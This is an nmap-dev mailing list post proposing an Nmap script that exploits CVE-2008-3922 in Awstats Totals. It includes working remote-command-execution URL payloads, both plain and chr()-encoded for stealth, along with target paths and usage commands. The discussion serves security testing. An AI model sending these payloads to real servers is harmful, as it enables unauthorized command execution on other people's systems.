Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14

[Paulino Calderon <paulino () calderonpale com>]

On 07/11/2011 02:43 AM, Paulino Calderon wrote:
> Hi nmap-dev,
>
> description = [[
>   http-awstatstotals-exec exploits a remote code execution 
> vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other 
> products based on it. It works on PHP4 and PHP5 with magic quotes 
> enabled. [CVE: 2008-3922]
>
>   Stealth mode encodes the command string using PHP's chr() function. Ex.
>   * Normal mode:
> <code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code> 
>
>   * Stealth mode:
> <code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code> 
>
>
> Common paths for Awstats Total:
> * /awstats/index.php
> * /awstatstotals/index.php
> * /awstats/awstatstotals.php
> ]]
>
> ---
> -- @usage
> -- nmap --script http-awstatstotals-exec.nse --script-args 
> 'http-awstatstotals-exec.cmd="uname -a", 
> http-awstatstotals-exec.stealth, 
> http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
> --
> -- @output
> -- PORT   STATE SERVICE REASON
> -- 80/tcp open  http    syn-ack
> -- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 
> CEST 2002 i686 GNU/Linux
> --
> -- @args http-awstatstotals-exec.uri Awstats Totals URI including path
> -- @args http-awstatstotals-exec.cmd Command to execute
> -- @args http-awstatstotals-exec.stealth Stealth mode encodes command 
> payload using PHP's chr()
> -- @args http-awstatstotals-exec.outfile Output file
> ---
>
>
>
> _______________________________________________
> Sent through the nmap-dev mailing list
> http://cgi.insecure.org/mailman/listinfo/nmap-dev
> Archived at http://seclists.org/nmap-dev/

This update uses PHP's chr() encoding as default.

Toni: Thanks for the suggestion. I'll update the output before 
commiting. I want to get some feedback before regarding how the script 
should behave since the only way to make sure an installation is 
vulnerable is by exploiting it and checking.

description = [[
  http-awstatstotals-exec exploits a remote code execution 
vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other 
products based on it. [CVE: 2008-3922]

This vulnerability can be exploited through the GET variable sort. The 
script queries the web server with the command payload encoded using 
PHP's chr() function:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* <code>/awstats/index.php</code>
* <code>/awstatstotals/index.php</code>
* <code>/awstats/awstatstotals.php</code>

References:
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922
* http://www.exploit-db.com/exploits/17324/
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args 
'http-awstatstotals-exec.cmd="uname -a", 
http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- nmap --script http-awstatstotals-exec.nse -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 
CEST 2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.outfile Output file
---
-- Other useful args when running this script:
-- http.useragent - User Agent to use in GET request
--

--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-awstatstotals-exec.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/